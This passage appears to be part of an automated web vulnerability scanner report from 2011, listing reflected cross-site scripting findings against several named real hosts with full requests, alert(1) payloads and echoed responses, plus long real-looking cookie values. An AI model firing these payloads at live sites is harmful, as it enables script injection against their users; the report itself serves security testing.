s58A7OAHop2IpDc4m8280xku0k8oHIeR5AC5BKl+RhW5IMqrDwA8arsFlx/IxAe6T991EglpgFwoUTNNOKD39is3z9p5xBjEuwn0SIYIO/65chkmsaj0lw74GfX4hNA3WhKg==; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="pUMV4ilDMIYVro/ikx0KzFTj+PdvjRT6ZWaNShYdEeUFrQxHwyMpN1rqGnQRFqa+S/25F36vD/K2JHqbAnH0QgNwBcu+xjfRUt71TzR3VARm14WJneK7F1Fl5EG7hmytolo9yu7iqbvp9O30jBTlsVDglkAW/N0HoFS7lrwuKmlcXO5RnxW/FpYas6guLqyU1VP0fgCPupcrhstDdQcnXlYEU3TZHyFJMkgpH9flr6TqmeTIey5PMNiQudi4NPqJZnmzRJp62T8KsVtaoPw+4TQ5ur68KzNOS28Vxrv6VFyWgMTSglDH/4ZGjWIjh06OqLdj6PjytXEZI7/47k9vQnHfpYP6mzRp79L8PJB8gssFocqOBJxgF/yXgtMt0CUaG2XJA7ZyYhr9yjDFO7zcr5vU4kRvEbe9eMzuC7ODERjeovwaWNHAc9voQt5QLKA/P6CtAJhwoh8cp3W5nRCa5h+Kxu6QvRl6fKJYa8GTAcp/XFNS13yyW+YVfVcDQ4A0tVPZp0CnNrFHoHNbzTeEQXAGthF+wehNumlWvAdYeIUc99vZrjnz47gHaA8KfvYs1DzpJUtJXuioPCshXywbGZXAItrKisst96/+1I9ggKMcMw8pNJd8giwdpin2RovJ/KyjZhlLC9jmC/3xPYuEzQHjAMxE13QJVlRWlZ7TTf+UKexS7QvkM0n9aT9Z4MxozrrR6+CwohbbSsfllXx6YlaRufejyyILgx88i6MpftURcuBtDrQh9ds6sr89Q6vZCPDMT09g44na9X5YWUc1n4kYm6KIdV9gLK1ntCoF5XQQgairyR+6aW0x8j8oEoa8v+8YF9UGIos2gxSjwp4NHLhPfwt2PtRsMGJjMEEZx2E3damoXCofW1eLBaom5a0q7JKxuY8Vqud/bpfCd8iLl9h9L38v5iJrOYy6/TpWrlFbshPMOU6Q8fYzJLhwoAWjyy3aD7fM5qDD6vkj/CKd2hLanSRNixPGycCMKxwJyDFJmGEN1qaZhCzw2Oo10QddAw8UDpDk5Z9mG+x93n/qhyvAfo9m9YZqq3TMGusykxptTJ5YzyI/YlixkY6IcBsDIZA3lO8oqzD+NDV6FA23GOCtNeTuygGJQT2NklRh0WTvUdrBGxhdKq6MIRqH6Z6vmSstqWU8JlqmKv9Mpld4JO4quyO5E1x81J6tFhoz02qnZT+9CrqmcOxFKus3LyBszdmpcsGqqdo8v0DVoaApSiCPKfrUOvPOttBzs75pKiv2ZZIz+roNUUfN2wG/xr66U6CVdAf5NFNtcTCNl5EsHkUlnHBtEpy7jMd3PqQpdVbyhCPrHc+yjfCtl0NvwHseEwipbkiA8lpTs1P2HaNXrQrn3hOT9k4i5alBdgwkL+AJ+AKfzRZJ0+evXmLv4bZnWMuy12p+7dVHkHEYsBMBj8lLkeeF45mYbqaJkPlrAQYFhQr3hJUqAYjQbRAOtSUdIQzLKN+Dsxyb14QcPrkJP5x+yU2ln27yWBxhxD3EZdeKXavQyII7tmlRVEFNg8fL/UvHE8Po5Az2wwSQw9p5ykXzXd6oQzeqkE6ulGDIBZXasEj/HKEsZInx3zLzEdqUPXlbaYmGq8vCPXrHY3MrtU0j+Ot4sIH2bV5ST8uO8sKhrffUc9zAJDWp9Td57AqE2XM2JJodGQEcT9qj5CdyCaUy5CFvWpeKR6NZChYRdUe1VhBHqvpAUuXI5+OksjNLASv2gljDCH/86fdDTRIZ86/Ywie9+EkqD/IqTMw1Fy9viFb1zLLKJQ5ym/tNQy8rK1zajO/dfc5gDUeNGDVKnHV/D0CTGlUqVmb0Iz1L/9UACYTzVibMQjj1NJRC/1omsUu9lAB9Dc6tgUEICxHD9sfQ3o3BQu/I6chgQagGvEexh0/C4rsqGS//22odQ0EPx5WuDKOGI9To0hSqu0TcDdNm8c5GBdzU5riw4cBVUVG8YVE6/I0IdYXIq1gWTPOZOkfn6Kc45yqJI5gPy8UB4yNOM8Ff+iTACg=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 16:02:28 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 20 Jul 2011 16:02:28 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:28 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "C07583405EA<SCRIPT>ALERT(1)</SCRIPT>C1EDA980F6D" was not recognized.
*/

4.109. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21 was submitted in the REST URL parameter 3. This input was echoed as f3fdf"><img src=a onerror=alert(1)>5eef32d9c21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2701


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/f3fdf"><img src=a onerror=alert(1)>5eef32d9c21=N onerror=netsparker(9)>
...[SNIP]...

4.110. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58 was submitted in the REST URL parameter 3. This input was echoed as 675ff><img src=a onerror=alert(1)>299ae41ef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/%22%3E%3CiMg%20src675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2710


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<iMg src675ff><img src=a onerror=alert(1)>299ae41ef58=N onerror=netsparker(9)>
...[SNIP]...

4.111. https://manager.linode.com/session/forgot_save/N [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/N

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 was submitted in the REST URL parameter 3. This input was echoed as 3fb26"><img src=a onerror=alert(1)>12901bad508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/N3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
Referer: https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2677


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/N3fb26"><img src=a onerror=alert(1)>12901bad508" method="post" onsubmit="return _CF_checkforgot_save(this)">
...[SNIP]...

4.112. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a30'%3balert(1)//7d4e8305cf was submitted in the admeld_callback parameter. This input was echoed as 95a30';alert(1)//7d4e8305cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95a30'%3balert(1)//7d4e8305cf HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXSwgIjE5MSI6IFsiNzM1MjgyMTM0NDMwMDgwMTA4MSIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMTk4MDAwMDg4NTg1OSIsIHRydWVdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 20:42:46 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 284

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95a30';alert(1)//7d4e8305cf?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540186&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743"/>
...[SNIP]...

4.113. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119bc"><script>alert(1)</script>62e3c2f614 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=119bc"><script>alert(1)</script>62e3c2f614&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dOXvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:06 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=2415557707156706131&fpid=119bc"><script>alert(1)</script>62e3c2f614&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.114. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe90d"><script>alert(1)</script>7ca5f466ef2 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

